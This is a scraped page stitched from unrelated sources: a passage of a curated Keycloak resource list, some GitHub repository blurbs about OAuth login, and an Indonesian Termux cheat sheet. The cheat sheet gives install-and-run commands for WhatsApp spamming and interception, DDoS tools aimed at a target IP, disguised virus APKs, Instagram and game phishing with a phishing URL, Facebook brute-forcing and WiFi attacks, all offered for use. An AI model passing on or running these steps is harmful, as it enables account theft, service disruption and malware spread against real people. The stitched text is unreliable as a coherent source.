Management](https://www.thomasvitale.com/introducing-keycloak-identity-access-management/) * [Keycloak Basic Configuration for Authentication and Authorisation](https://www.thomasvitale.com/keycloak-configuration-authentication-authorisation/) * [Keycloak on OpenShift Origin](https://medium.com/@james_devcomb/keycloak-on-openshift-origin-ee81d01dac97) * [Identity Management, One-Time-Passwords and Two-Factor-Auth with Spring Boot and Keycloak](http://www.hascode.com/2017/11/identity-management-one-time-passwords-and-two-factor-auth-with-spring-boot-and-keycloak/) * [Keycloak Identity Brokering with Openshift](https://developers.redhat.com/blog/2017/12/06/keycloak-identity-brokering-openshift/) * [OpenID Connect Identity Brokering with Red Hat Single Sign-On](https://developers.redhat.com/blog/2017/10/18/openid-connect-identity-brokering-red-hat-single-sign/) * [Authentication & user management is hard](https://eclipsesource.com/blogs/2018/01/11/authenticating-reverse-proxy-with-keycloak/) * [Securing Nginx with Keycloak](https://edhull.co.uk/blog/2018-06-06/keycloak-nginx) * [Secure kibana dashboards using keycloak](https://aboullaite.me/secure-kibana-keycloak/) * [Configuring NGINX for OAuth/OpenID Connect SSO with Keycloak/Red Hat SSO](https://developers.redhat.com/blog/2018/10/08/configuring-nginx-keycloak-oauth-oidc/) * [Keycloak Clustering Setup and Configuration Examples](https://github.com/fit2anything/keycloak-cluster-setup-and-configuration) * [MicroProfile JWT with Keycloak](https://kodnito.com/posts/microprofile-jwt-with-keycloak/) * [Keycloak Essentials](https://medium.com/keycloak/keycloak-essentials-86254b2f1872) * [SSO-session failover with Keycloak and AWS S3](https://medium.com/@georgijsr/sso-session-failover-with-keycloak-and-aws-s3-e0b1db985e12) * [KTOR and Keycloak: authentication with OpenId](https://medium.com/slickteam/ktor-and-keycloak-authentication-with-openid-ecd415d7a62e) * [Keycloak: Core concepts of open source identity and access management](https://developers.redhat.com/blog/2019/12/11/keycloak-core-concepts-of-open-source-identity-and-access-management) * [Who am I? Keycloak Impersonation API](https://blog.softwaremill.com/who-am-i-keycloak-impersonation-api-bfe7acaf051a) * [Setup Keycloak Server on Ubuntu 18.04](https://medium.com/@hasnat.saeed/setup-keycloak-server-on-ubuntu-18-04-ed8c7c79a2d9) * [Getting started with Keycloak](https://robferguson.org/blog/2019/12/24/getting-started-with-keycloak/) * [Angular, OpenID Connect and Keycloak](https://robferguson.org/blog/2019/12/29/angular-openid-connect-keycloak/) * [Angular, OAuth 2.0 Scopes and Keycloak](https://robferguson.org/blog/2019/12/31/angular-oauth2-keycloak/) * [Keycloak, Flowable and OpenLDAP](https://robferguson.org/blog/2020/01/03/keycloak-flowable-and-openldap/) * [How to exchange token from an external provider to a keycloak token](https://www.mathieupassenaud.fr/token-exchange-keycloak/) * [Building an Event Listener SPI (Plugin) for Keycloak](https://dev.to/adwaitthattey/building-an-event-listener-spi-plugin-for-keycloak-2044) * [Keycloak user migration – connect your legacy authentication system to Keycloak](https://codesoapbox.dev/keycloak-user-migration/) * [Keycloak Authentication and Authorization in GraphQL](https://medium.com/@darahayes/keycloak-authentication-and-authorization-in-graphql-ad0a1685f7da) * [Kong / Konga / Keycloak: securing API through OIDC](https://github.com/d4rkstar/kong-konga-keycloak) * [KeyCloak: Custom Login theme](https://codehumsafar.wordpress.com/2018/09/11/keycloak-custom-login-theme/) * [Keycloak: Use background color instead of background image in Custom Login theme](https://codehumsafar.wordpress.com/2018/09/21/keycloak-use-background-color-instead-of-background-image-in-custom-login-theme/) * [How to turn off the Keycloak theme cache](https://keycloakthemes.com/blog/how-to-turn-off-the-keycloak-theme-cache) * [How to add a custom field to the Keycloak registration page](https://keycloakthemes.com/blog/how-to-add-custom-field-keycloak-registration-page) * [How to setup Sign in with Google using Keycloak](https://keycloakthemes.com/blog/how-to-setup-sign-in-with-google-using-keycloak) * [How to sign in users on Keycloak using Github](https://keycloakthemes.com/blog/how-to-sign-in-users-on-keycloak-using-github) * [Extending Keycloak SSO Capabilities with IBM Security Verify](https://community.ibm.com/community/user/security/blogs/jason-choi1/2020/06/10/extending-keycloak-sso-capabilities-with-ibm-secur) * [AWS SAML based User Federation using Keycloak](https://medium.com/@karanbir.tech/aws-connect-saml-based-identity-provider-using-keycloak-9b3e6d0111e6) * [AWS user account OpenID federation using Keycloak](https://medium.com/@karanbir.tech/aws-account-openid-federation-using-keycloak-40d22b952a43) * [How to Run Keycloak in HA on Kubernetes](https://blog.sighup.io/keycloak-ha-on-kubernetes/) * [How to create a Keycloak authenticator as a microservice?](https://medium.com/application-security/how-to-create-a-keycloak-authenticator-as-a-microservice-ad332e287b58) * [keycloak.ch | Installing & Running Keycloak](https://keycloak.ch/keycloak-tutorials/tutorial-1-installing-and-running-keycloak/) * [keycloak.ch | Configuring Token Exchange using the CLI](https://keycloak.ch/keycloak-tutorials/tutorial-token-exchange/) * [keycloak.ch | Configuring WebAuthn](https://keycloak.ch/keycloak-tutorials/tutorial-webauthn/) * [keycloak.ch | Configuring a SwissID integration](https://keycloak.ch/keycloak-tutorials/tutorial-swissid/) * [Getting Started with Service Accounts in Keycloak](https://medium.com/@mihirrajdixit/getting-started-with-service-accounts-in-keycloak-c8f6798a0675) * [Building cloud native apps: Identity and Access Management](https://dev.to/lukaszbudnik/building-cloud-native-apps-identity-and-access-management-1e5m) * [X.509 user certificate authentication with Red Hat’s single sign-on technology](https://developers.redhat.com/blog/2021/02/19/x-509-user-certificate-authentication-with-red-hats-single-sign-on-technology) * [Grafana OAuth with Keycloak and how to validate a JWT token](https://janikvonrotz.ch/2020/08/27/grafana-oauth-with-keycloak-and-how-to-validate-a-jwt-token/) * [How to setup a Keycloak server with external MySQL database on AWS ECS Fargate in clustered mode](https://jbjerksetmyr.medium.com/how-to-setup-a-keycloak-server-with-external-mysql-database-on-aws-ecs-fargate-in-clustered-mode-9775d01cd317) * [Extending Keycloak: adding API key authentication](http://www.zakariaamine.com/2019-06-14/extending-keycloak) * [Extending Keycloak: using a custom email sender](http://www.zakariaamine.com/2019-07-14/extending-keycloak2) * [Integrating Keycloak and OPA with Confluent](https://goraft.tech/2021/03/17/integrating-keycloak-and-opa-with-confluent.html) * [UMA 2.0 : User Managed Access - how to use it with bash](https://blog.please-open.it/uma/) ## Talks * [JDD2015 - Keycloak Open Source Identity and Access Management Solution](https://www.youtube.com/watch?v=TuEkj25lbd0) * [2015 Using Tomcat and Keycloak in an iFrame](https://www.youtube.com/watch?v=nF_lw7uIxao) * [2016 You've Got Microservices Now Secure Them](https://www.youtube.com/watch?v=SfVhqf-rMQY) * [2016 Keycloak: Open Source Single Sign On - Sebastian Rose - AOE conf (german)](https://www.youtube.com/watch?v=wbKw0Bwyne4) * [2016 Sécuriser ses applications back et front facilement avec Keycloak (french)](https://www.youtube.com/watch?v=bVidgluUcg0) * [2016 Keycloak and Red Hat Mobile Application Platform](https://www.youtube.com/watch?v=4NBgiHM5aOA) * [2016 Easily secure your Front and back applications with KeyCloak](https://www.youtube.com/watch?v=RGp4HUKikts) * [2017 Easily secure your Spring Boot applications with Keycloak - Part 1](https://developers.redhat.com/video/youtube/vpgRTPFDHAw/) * [2017 Easily secure your Spring Boot applications with Keycloak - Part 2](https://developers.redhat.com/video/youtube/O5ePCWON08Y/) * [2018 How to secure your Spring Apps with Keycloak by Thomas Darimont @ Spring I/O 2018](https://www.youtube.com/watch?v=haHFoeWUj0w) * [2018 DevNation Live | A Deep Dive into Keycloak](https://www.youtube.com/watch?v=ZxpY_zZ52kU) * [2018 IDM Europe: WSO2 Identity Server vs. Keycloak (Dmitry Kann)](https://www.youtube.com/watch?v=hnjBiGsEDoU) * [2018 JPrime|Building an effective identity and access management architecture with Keycloak (Sebastien Blanc)](https://www.youtube.com/watch?v=bMqcGkCvUVQ) * [2018 WJAX| Sichere Spring-Anwendungen mit Keycloak](https://www.youtube.com/watch?v=6Z490EMcafs) * [2019 Spring I/O | Secure your Spring Apps with Keycloak](https://www.youtube.com/watch?v=KrOd5wIkqls) * [2019 DevoxxFR | Maitriser sa gestion de l'identité avec Keycloak (L. Benoit, T. Recloux, S. Blanc)](https://www.youtube.com/watch?v=0cziL__0-K8) * [2019 DevConf | Fine - Grained Authorization with Keycloak SSO (Marek Posolda)](https://www.youtube.com/watch?v=yosg4St0iUw) * [2019 VoxxedDays Minsk | Bilding an effective identity and access management architecture with Keycloak (Sebastien Blanc)](https://www.youtube.com/watch?v=RupQWmYhrLA) * [2019 Single-Sign-On Authentifizierung mit dem Keycloak Identity Provider | jambit CoffeeTalk](https://www.youtube.com/watch?v=dnY6ORaFNY8) * [2020 Keycloak Team | Keycloak Pitch](https://www.youtube.com/watch?v=GZTN_VXjoQw) * [2020 Keycloak Team | Keycloak Overview](https://www.youtube.com/watch?v=duawSV69LDI) * [2020 Please-open.it : oauth2 dans le monde des ops (french)](https://www.youtube.com/watch?v=S-9X50QajmY) ## Presentations * [Keycloak 101](https://stevenolen.github.io/kc101-talk/#1) ## Video Playlists * [Keycloak Identity and Access Management by Łukasz Budnik](https://www.youtube.com/playlist?list=PLPZal7ksxNs0mgScrJxrggEayV-TPZ9sA) * [Keycloak by Niko Köbler](https://www.youtube.com/playlist?list=PLNn3plN7ZiaowUvKzKiJjYfWpp86u98iY) * [Keycloak Playlist by hexaDefence](https://youtu.be/35bflT_zxXA) * [Keycloak Tutorial Series by CodeLens](https://www.youtube.com/watch?v=Lr9WeIMtFow&list=PLeGNmkzI56BTjRxNGxUhh4k30FD_gy0pC) ## Clients * [Official Keycloak Node.js Admin Client](https://github.com/keycloak/keycloak-admin-client/) ("Extremely Experimental") * [Keycloak Node.js TypeScript Admin Client by Canner](https://github.com/Canner/keycloak-admin/) * [Keycloak Go Client by Cloudtrust](https://github.com/cloudtrust/keycloak-client) * [Keycloak Nest.js Admin Client by Relevant Fruit](https://github.com/relevantfruit/nestjs-keycloak-admin) ## Community Extensions * [Keycloak Extensions List](https://www.keycloak.org/extensions.html) * [Keycloak Benchmark Project](https://github.com/keycloak/keycloak-benchmark) * [Keycloak: Link IdP Login with User Provider](https://github.com/ohioit/keycloak-link-idp-with-user) * [Client Owner Manager: Control who can edit a client](https://github.com/cyclone-project/cyclone-client-registration) * [Keyloak Proxy written in Go](https://github.com/gambol99/keycloak-proxy) * [Script based ProtocolMapper extension for SAML](https://github.com/cloudtrust/keycloak-client-mappers) * [Realm export REST resource by Cloudtrust](https://github.com/cloudtrust/keycloak-export) * [Keycloak JDBC Ping Setup by moremagic](https://github.com/moremagic/keycloak-jdbc-ping) * [SMS 2 Factor Authentication for Keycloak via AWS SNS](https://github.com/nickpack/keycloak-sms-authenticator-sns) * [SMS 2 Factor Authentiation for Keycloak via SMS by Alliander](https://github.com/Alliander/keycloak-sms-authenticator) * [Identity Provider for vk.com](https://github.com/mrk08/keycloak-vk) * [CAS Protocol Support](https://github.com/Doccrazy/keycloak-protocol-cas) * [WS-FED Support](https://github.com/cloudtrust/keycloak-wsfed) * [Keycloak Discord Support](https://github.com/wadahiro/keycloak-discord) * [Keycloak Login with User Attribute](https://github.com/cnieg/keycloak-login-attribute) * [zonaut/keycloak-extensions](https://github.com/zonaut/keycloak-extensions) * [leroyguillaume/keycloak-bcrypt](https://github.com/leroyguillaume/keycloak-bcrypt) * [SPI Authenticator in Nodejs](https://www.npmjs.com/package/keycloak-rest-authenticator) * [Have I Been Pwned? Keycloak Password Policy](https://github.com/alexashley/keycloak-password-policy-have-i-been-pwned) * [Keycloak Eventlistener for Google Cloud Pub Sub](https://github.com/acesso-io/keycloak-event-listener-gcpubsub) * [Enforcing Password policy based on attributes of User Groups](https://github.com/sayedcsekuet/keycloak-user-group-based-password-policy) * [Verify Email with Link or Code by hokumski](https://github.com/hokumski/keycloak-verifyemailwithcode) * [Role-based Docker registry authentication](https://github.com/lifs-tools/keycloak-docker-role-mapper) * [SCIM for keycloak](https://github.com/Captain-P-Goldfish/scim-for-keycloak) * [Keycloak Kafka Module](https://github.com/SnuK87/keycloak-kafka) ## Integrations * [Official Keycloak Node.js Connect Adapter](https://github.com/keycloak/keycloak-nodejs-connect) * [Keycloak support for Aurelia](https://github.com/waynepennington/aurelia-keycloak) * [Keycloak OAuth2 Auth for PHP](https://github.com/stevenmaguire/oauth2-keycloak) * [Jenkins Keycloak Authentication Plugin](https://github.com/jenkinsci/keycloak-plugin) * [Meteor Keycloak Accounts](https://github.com/mxab/meteor-keycloak) * [HapiJS Keycloak Auth](https://github.com/felixheck/hapi-auth-keycloak) * [zmartzone mod_auth_openidc for Apache 2.x](https://github.com/zmartzone/mod_auth_openidc) * [Duo Security MFA Authentication for Keycloak](https://github.com/mulesoft-labs/keycloak-duo-spi) * [Extension Keycloak facilitant l'utilisation de FranceConnect](https://github.com/InseeFr/Keycloak-FranceConnect) * [Ambassador Keycloak Support](https://www.getambassador.io/reference/idp-support/keycloak/) * [Keycloak Python Client](https://github.com/akhilputhiry/keycloak-client) * [Keycloak Terraform Provider](https://github.com/mrparkers/terraform-provider-keycloak) * [Keycloak ADFS OpenID Connect](https://www.michaelboeynaems.com/keycloak-ADFS-OIDC.html) * [React/NextJS Keycloak Bindings](https://github.com/panz3r/react-keycloak) * [Keycloak Open-Shift integration](https://github.com/keycloak/openshift-integration) * [Keycloak, Kong and Konga setup scripts (local development)](https://github.com/JaouherK/Kong-konga-Keycloak) * [SSO for Keycloak and Nextcloud with SAML](https://stackoverflow.com/questions/48400812/sso-with-saml-keycloak-and-nextcloud) * [Keycloak Connect GraphQL Adapter for Node.js](https://github.com/aerogear/keycloak-connect-graphql) * [python-keycloak](https://github.com/marcospereirampj/python-keycloak) * [Keycloak and PrivacyId3a docker-compose (local development)](https://github.com/JaouherK/keycloak-privacyIdea) * [Nerzal/gocloak Golang Keycloak API Package](https://github.com/Nerzal/gocloak) * [Apple Social Identity Provider for Keycloak](https://github.com/BenjaminFavre/keycloak-apple-social-identity-provider) ## Quick demo Videos * [Keycloak with istio envoy jwt-auth proxy](https://www.youtube.com/watch?v=wscX7JMfuBI) ## Themes * [Community Keycloak Ionic Theme](https://github.com/lfryc/keycloak-ionic-theme) * [A Keycloak theme based on the AdminLTE UI library](https://github.com/MAXIMUS-DeltaWare/adminlte-keycloak-theme) * [GOV.UK Theme](https://github.com/UKHomeOffice/keycloak-theme-govuk) * [Carbon Design](https://github.com/httpsOmkar/carbon-keycloak-theme) * [Modern](https://keycloakthemes.com/themes/modern) * [Adminlte](https://git.uptic.nl/uptic-public-projects/uptic-keyclock-theme-adminlte) * [keycloakify: Create Keycloak themes using React](https://github.com/InseeFrLab/keycloakify) ## Docker * [Official Keycloak Docker Images](https://github.com/jboss-dockerfiles/keycloak) * [Keycloak Examples as Docker Image](https://hub.docker.com/r/jboss/keycloak-examples) * [Keycloak Maven SDK for managing the entire lifecycle of your extensions with Docker](https://github.com/OpenPj/keycloak-docker-quickstart) ## Kubernetes * [Deprecated Keycloak Helm Chart](https://github.com/codecentric/helm-charts/tree/master/charts/keycloak) * [codecentric Keycloak Helm Chart](https://github.com/codecentric/helm-charts/tree/master/charts/keycloak) * [Import / Export Keycloak Config](https://gist.github.com/unguiculus/19618ef57b1863145262191944565c9d) * [keycloak-operator](https://github.com/keycloak/keycloak-operator) ## Tools * [keycloakmigration: Manage your Keycloak configuration with code](https://github.com/klg71/keycloakmigration) * [tool to autogenerate an OpenAPI Specification for Keycloak's Admin API](https://github.com/ccouzens/keycloak-openapi) * [oidc-bash-client](https://github.com/please-openit/oidc-bash-client) * [louketo-proxy (FKA Gatekeeper)](https://github.com/louketo/louketo-proxy) * [keycloak-config-cli: Configuration as Code for Keycloak](https://github.com/adorsys/keycloak-config-cli) * [Keycloak Pulumi](https://github.com/pulumi/pulumi-keycloak) * [Keycloak on AWS](https://github.com/aws-samples/keycloak-on-aws) * [aws-cdk construct library that allows you to create KeyCloak on AWS in TypeScript or Python](https://github.com/aws-samples/cdk-keycloak) * [keycloak-scanner Python CLI](https://github.com/NeuronAddict/keycloak-scanner) ## Deployment Examples * [Keycloak deployment with CDK on AWS with Fargate](https://github.com/aws-samples/cdk-keycloak) ## Example Projects * [Examples from Keycloak Book: Keycloak - Identity and Access Management for Modern Applications](https://github.com/PacktPublishing/Keycloak-Identity-and-Access-Management-for-Modern-Applications) * [Official Examples](https://github.com/keycloak/keycloak/tree/master/examples) * [Keycloak Quickstarts](https://github.com/keycloak/keycloak-quickstarts) * [Drupal 7.0 with Keycloak](https://gist.github.com/thomasdarimont/17fa146c4fb5440d7fc2ee6322ec392d) * [Securing Realm Resources With Custom Roles](https://github.com/dteleguin/custom-admin-roles) * [BeerCloak: a comprehensive KeyCloak extension example](https://github.com/dteleguin/beercloak) * [KeyCloak Extensions: Securing Realm Resources With Custom Roles](https://github.com/dteleguin/custom-admin-roles) * [Red Hat Single Sign-On Labs](https://github.com/RedHatWorkshops/red-hat-sso) * [Spring Boot Keycloak Tutorial](https://github.com/sebastienblanc/spring-boot-keycloak-tutorial) * [Custom Keycloak Docker Image of Computer Science House of RIT](https://github.com/ComputerScienceHouse/keycloak-docker) * [Example of custom password hash SPI for Keycloak](https://github.com/pavelbogomolenko/keycloak-custom-password-hash) * [Example for a custom http-client-provider with Proxy support](https://github.com/xiaoyvr/custom-http-client-provider) * [Monitor your keycloak with prometheus](https://github.com/larscheid-schmitzhermes/keycloak-monitoring-prometheus) * [Custom User Storage Provider .ear with jboss-cli setup](https://github.com/thomasdarimont/keycloak-user-storage-provider-demo) * [Keycloak - Experimental extensions by Stian Thorgersen/Keycloak](https://github.com/stianst/keycloak-experimental) * [Securing Spring Boot Admin & Actuator Endpoints with Keycloak](https://github.com/thomasdarimont/spring-boot-admin-keycloak-example) * [A Keycloak Mobile Implementation using Angular v4 and Ionic v3](https://github.com/tomjackman/keyonic-v2) * [Example for Securing Apps with Keycloak on Kubernetes](https://github.com/stianst/demo-kubernetes) * [Example for Securing AspDotNet Core Apps with Keycloak](https://github.com/thomasdarimont/kc-dnc-demo) * [Example for passing custom URL parameters to a Keycloak theme for dynamic branding](https://github.com/dteleguin/keycloak-dynamic-branding) * [Angular Webapp secured with Keycloak](https://github.com/CodepediaOrg/bookmarks.dev) * [Keycloak Theme Development Kit](https://github.com/anthonny/kit-keycloak-theme) * [Keycloak Clustering examples](https://github.com/ivangfr/keycloak-clustered) * [Keycloak Last Login Date Event Listener](https://github.com/ThoreKr/keycloak-last-login-event-listener) * [Keycloak Project Example (Customizations, Extensions, Configuration)](https://github.com/thomasdarimont/keycloak-project-example) * [Example of adding API Key authentication to Keycloak](https://github.com/zak905/keycloak-api-key-demo) ## Benchmarks * [Gatling based Benchmark by @rvansa](https://github.com/rvansa/keycloak-benchmark) ## Help * [Keycloak on Stackoverflow](https://stackoverflow.com/questions/tagged/keycloak) ## Commercial Offerings * [Red Hat Single Sign-On](https://access.redhat.com/products/red-hat-single-sign-on) * [INTEGSOFT UNIFIED USER CREDENTIALS WITH KEYCLOAK SSO](https://www.integsoft.cz/en/sso.html#what-is-sso) * [JIRA SSO Plugin by codecentric](https://marketplace.atlassian.com/plugins/de.codecentric.atlassian.oidc.jira-oidc-plugin/server/overview) * [Keycloak Competence Center by Inventage AG](https://keycloak.ch/) * [Keycloak as a Service](https://www.cloud-iam.com) ## Miscellaneous * [Find sites using Keycloak with google](https://www.google.de/search?q=inurl%3Aauth+inurl%3Arealms+inurl%3Aprotocol&oq=inurl%3A&client=ubuntu&sourceid=chrome&ie=UTF-8) * [Keycloak Dev Bookmarks](http://bookmarks.dev/search?q=keycloak) - Use the tag [keycloak](https://www.bookmarks.dev/tagged/keycloak) * [Use fail2ban to block brute-force attacks to keycloak server](https://gist.github.com/drmalex07/3eba8b98d0ac4a1e821e8e721b3e1816) * [Pentest-Report Keycloak 8.0 Audit & Pentest 11.2019 by Cure53](https://cure53.de/pentest-report_keycloak.pdf) * [Keycloak - CNCF Security SIG - Self Assesment](https://docs.google.com/document/d/14IIGliP3BWjdS-0wfOk3l_1AU8kyoSiLUzpPImsz4R0/edit#) # License [](https://creativecommons.org/publicdomain/zero/1.0/) To the extent possible under law, [Thomas Darimont](https://github.com/thomasdarimont) has waived all copyright and related or neighboring rights to this work.
koushikkothagal / Spring Github Login StarterStarter Spring Boot project for OAuth login with GitHub
AhsenSaeed / FirebaseSocialAuthKotlin Android Firebase Login Flow of Facebook, Twitter, GitHub, Google.
akeeba / SocialloginJoomla!™ login and user account creation with Facebook, Google, GitHub etc social media accounts
viniciusthiengo / Nosso ChateProjeto Java Android - construção de um Chat Firebase Android.
Alisherka7 / Animated Login Form Avatar.github.ioNo description available
DaviesGit / Asset Manager该资产管理系统拥有独创的二维码设备定位技术,可以通过二维码方便的定位对应的设备。该资产管理系统可以支持对资产进行采购、验收、建账、借用、归还、报废、报失等操作。同时支持批量导入和导出操作。网站的静态界面展示:https://daviesgit.github.io/asset_manager/static/website/login/login.html
AhapraxAhmed / PetcareFurShield is a full-stack web app for pet care, enabling owners, vets, and shelters to manage pets, health records, appointments, and products. It features AI pet care assistance and Google/GitHub social login, offering a secure, responsive, and centralized pet management platform.
dickwall / Activator Play Oauth2 ScalaAn example of OAuth2 for login auth and API usage against github using play and Scala
didinj / Node Facebook Twitter Google Github LoginNode, Express, Mongoose, Passport, Facebook, Twitter, Google and Github Authentication (Login)
pnp / Action Cli LoginGitHub action to login to a tenant using CLI for Microsoft 365
sllumenikmati21 / MisteriusxxKUMPULAN CODE TERMUX LENGKAP | SPAM CHAT WHATSAPP || nggk usah nyepam gw -_* atau hp lu gw ledakin!!#@vms $ pkg update && pkg upgrade Setelah mengupdate dan mengupgrade termux ketikan perintah berikut : $ pkg install python2 (y/n pilih y) $ pkg install php (y/n pilih y) $ pkg install git (y/n pilih y) Setalah mengikuti perintah di atas waktu-nya kita clonning tool-nya : $ git clone https://github.com/siputra12/prank.git Setelah proses cloning selesai kita move on dari perintah di atas dan ketikan perintah ini : $ cd prank $ ls $ php wa.php Kemudian masukan Nomor WhatsApp yang kalian ingin spam contoh : 085710917169 kemudian enter pada pilihan y/n pilih y .. .welcome back to me catatan:).... #@vms " jngan lupa subcribe pak *VEMAS DARK* -_-... (:" "phising game" (mobile legends dan clash of clan) $apt update $apt upgrade -y $pkg install python2 -y $pkg install apache2 $pkg install php -y $pkg install git $git clone https://github.com/Senitopeng/PhisingGame $ls $cd PhisingGame $python2 phising.py *Gunain dengan bijak cuk -_-* Cara Install OSIF ( Open Source Information Facebook ) $ pkg install python2 $ git clone https://github.com/ciku370/OSIF $ cd OSIF $ pip2 install -r requirements.txt Dan cara menjalankannya menggunakan perintah : python2 osif.py by: *Vdk* *~CARA SADAP WA~* *_SeNaNg-SeNaNg H4CK1NG MR.STAH_* $pkg update && pkg upgrade $pkg install git $pkg install curl $git clone https://github.com/AndriGanz/whatshack $cd whatshack $ls $sh whatshack.sh *~Jangan salah gunakan~* Tutorial termux Silahkan perdalami... D-tect tool Cara Install D-tect tool di android termux (command ) : $ apt install git $ apt install python2 $ git clone https://github.com/shawarkhanethicalhacker/D-TECT $ ls $ cd D-TECH $ chmod +x d-tect.py $ python2 d-tect.py 2. cara uninstall tool termux rm -rf toolsnya 3. cara buat virus cd /sdcard cd vbug ls chmod vbug.py chmod -v vbug.py python2 vbug.py 4. irssi /connet irc.freenode.net /nick w3wandroid /join #modol _________________________ DDOS via Termux ———————————— 1. Hammer $ pkg update (tekan enter) $ pkg upgrade (tekan enter) $ pkg install python (tekan enter) $ pkg install git (tekan enter) $ git clone https://github.com/cyweb/hammer (tekan enter) $ cd hammer (tekan enter) $ python hammer.py (tekan enter) $ python hammer.py -s [IP target] -p [port] -t 135 (tekan enter) 104.27.146.125 2. Xerxes $ apt install git $ apt install clang $ git clone https://github.com/zanyarjamal/xerxes $ ls $ cd xerxes $ ls $ clang xerxes.c -o xerxes $ ls $ ./xerxes (nama website) 80 3. Torshammer $ pkg update $ pkg install git $ apt install tor $ pkg install python2 $ git clone https://github.com/dotfighter/torshammer.git $ ls $ cd torshammer $ python2 torshammer.py 4. liteDDOS $ apt update $ apt upgrade $ pkg install git $ pkg install python2 $ git clone https://github.com/4L13199/LITEDDOS $ cd LITEDDOS $ python2 liteDDOS.py _________________________________________ Bermain moon-buggy $ pkg install moon-buggy $ moon-buggy ________________________________________ Musikan di termux $ pkg install mpv $ mpv/sdcard/lagu.mp3 /sdcard/ bisa di ganti sesuai letak musik ________________________________________ Browsing di termux $ pkg install w3m $ w3m www.google.com Linknya bsa diubah ________________________________________ Telephone di termux $ pkg install termux-api $ termux-telephony-call nomornya _______________________________________ Menampilkan animasi kereta $ pkg install sl $ sl _______________________________________ menampilkan ikon dan informasi sistem android $ pkg install neofetch $ neofetch _______________________________________ menampilkan teks dalam format ASCII $ pkg install figlet $ figlet masukin teksnya _______________________________________ Cara Mendengarkan Yotuube di termux $ pip install mps_youtube $ pip install youtube_dl $ apt install mpv $ mpsyt $ /judul lagu Tinggal pilih lagu dgn mengetik nomornya. Tutorial membuat virus seperti aplikasi aslinya Tools yang dibutuhkan: APK Editor & tool vbug APK Editor bisa didownload di playstore Tool vbug Here 1. Download tool vbugnya dulu 2. Taruh file tool vbug di luar folder pada memori internal 3. Buka termux lalu $ cd /sdcard 4. $ unzip vbug.zip 5. $ cd vbug 6. $ python2 vbug.py 7. Enter 8. Ketik 10 9. Ketik E 10. Aplikasi virusnya sudah jadi Setelah aplikasinya jad kita tinggal edit supaya mirip aslinya 1. Buka APK Editor 2. Klik Select an Apk File 3. Pilih aplikasi virus tadi 4. Klik full edit 5. Pada bagian kolom app_name tulis nama aplikasi yang kalian inginkan 6. Lalu klik files 7. Klik res/drawable 8. Logo yang kedua itu ganti dengan logo aplikasi yang kalian inginkan Catatan: format logo harus .png 9. Ceklist logo yang kedua lalu replace 10. Pilih file logo yang mau dijadikan logo aplikasi agan 11. Back sampai home Supaya aplikasi terlihat lebih nyata kita harus beri bobot pada aplikasi buatan kita 12. Klik tanda plus yang ada di bawah kiri, pilih file, lagu, gambar atau apapun yang coxok sebagai bobot apliaksi agan 13. Klik build 14. Tunggu hingga selesai 15. Jadi deh ———————— Auto boot fb git clone https://github.com/Senitopeng/BotFbBangDjon.git cd BotFbBangDjon python2 bangdjon.py melihat id fb https://findmyfbid.in/ Autoreaction Facebook git clone https://github.com/tomiashari/fb-autoreaction.git cd fb-autoreaction python2 fb-autoreaction •TOOLS²TERMUX.P3 21.TOOLS SQLMAP apt update apt install python apt install python2 apt install git git clone https://github.com/sqlmapproject/sqlmap cd sqlmap python2 sqlmap.py ============================= 22.TUTORIAL PHISING INSTAGRAM VIA TERMUX pkg update pkg upgrade pkg install python2 pkg install git clear git clone https://github.com/evait-secutiry/weeman.git cd ls cd weeman python2 weeman.py show set url http://dewopanel.host22.com/masuk.php set port 8080 set action_url http://dewopanel.host22.com/masuk.php run ============================= 23.TUTORIAL MENAMBAH FOLLOWERS&LIKE INSTAGRAM Kegunaan untuk menambah follower dan like ig pkg update pkg upgrade pkg install python2 pkg install ruby gem install lolcat pkg install git git clone https://github.com/Hanzelnutt/instabot cd instabot ls pip2 install -r requirements.txt bash instabot ============================= 24.TUTOR HACK WIFI KHUSUS ROOT apt update apt upgrade apt install git git clone https://github.com/esc0rtd3w/wifi-hacker ls cd wifi-hacker ls chmod +x wifi-hacker.sh ls ./wifi-hacker.sh ============================= 25.TOOLS xNOT_FOUND *VER1* apt update && apt upgrade pkg install git pkg install gem pkg install figlet gem install lolcat git clone https://github.com/hatakecnk/xNot_Found cd xNot_Found sh xNot_Found.sh ============================= 26.HACK FB Nih ada tutor buat lewat TERMUX buat hack FB apt update && apt upgrade apt install python apt install python2 apt install ruby apt install git apt install wget apt install curl pip2 install mechanize pip2 install requests git clone https://github.com/hnov7/mbf *tunggu hingga selesai,jika sudah selesai *silahkan buka tab baru atau new session lalu ketik : cd mbf python2 mbf.py ============================= 27.HACK GMAIL apt-get update && apt-get upgrade apt-get install git apt-get install python python-pip python-setuptools pip install scapy git clone https://github.com/wifiphisher/wifiphisher.git cd wifiphisher< python setup.py install cd wifiphisher python wifiphisher ============================= 28.BERMAIN MOON-BUGGY pkg install moon-buggy moon-buggy ============================= 29.PERKIRAAN CUACA curl http://wttr.in/ (lokasi) ============================= 30.BROWSING DI TERMUX pkg install w3m w3m www.google.com Linknya bsa diubah ============================= [8/10 19.49] Yovis Si Wibub: Apt update Apt upgrade Apt install mechanize Apt install git git clone http://github.com/hnov7/mbf cd mbf python2 mbf. py Mbf tanpa username dan password. Jdi tinggl make aja [8/10 19.49] Yovis Si Wibub: --------------------------TOTUR MBF-----------------------$ pkg update && pkg upgrade $ pkg install python2 $ pip2 install mechanize $ git clone https://github.com/pirmansx/mbf Cara Menjalankannya : $ ls $ cd mbf $ python2 MBF.py [9/10 17.25] *~I⃟i⃟i⃟i⃟i⃟i⃟i⃟i⃟i⃟i⃟i⃟: Memper Cantik/Melihat V.Android Termux $ pkg update && pkg upgrade $ pkg install ruby cowsay toilet figlet $ pkg install neofetch $ pkg install nano $ gem install lolcat $ cd ../usr/etc $ nano bash.bashrc cowsay -f eyes Cyber | lolcat toilet -f standard Indonesia -F gay neofetch date | lolcat ✓ Hack FB rombongan $ apt update && apt upgrade $ pkg install python2 git $ pip2 install mechanize $ git clone http://github.com/pirmansx/mbf $ ls $ cd mbf $ python2 MBF.py ✓ Hack FB ngincer $ Apt update ( Enter ) $ Apt upgrade ( Enter ) $ Apt install python2 ( Enter ) $ pip2 install urllib3 chardet certifi idna requests ( Enter ) $ apt install openssl curl ( Enter ) $ pkg install libcurl ( Enter ) $ ln /sdcard ( Enter ) $ cd /sdcard ( Enter ) $ python2 fbbrute.py ( Enter ) ✓ Hack Gmail apt-get update && apt-get upgrade $ apt-get install git $ apt-get install python python-pip python-setuptools $ pip install scapy $ git clone https://github.com/wifiphisher/wifiphisher.git $ cd wifiphisher< $ python setup.py install $ cd 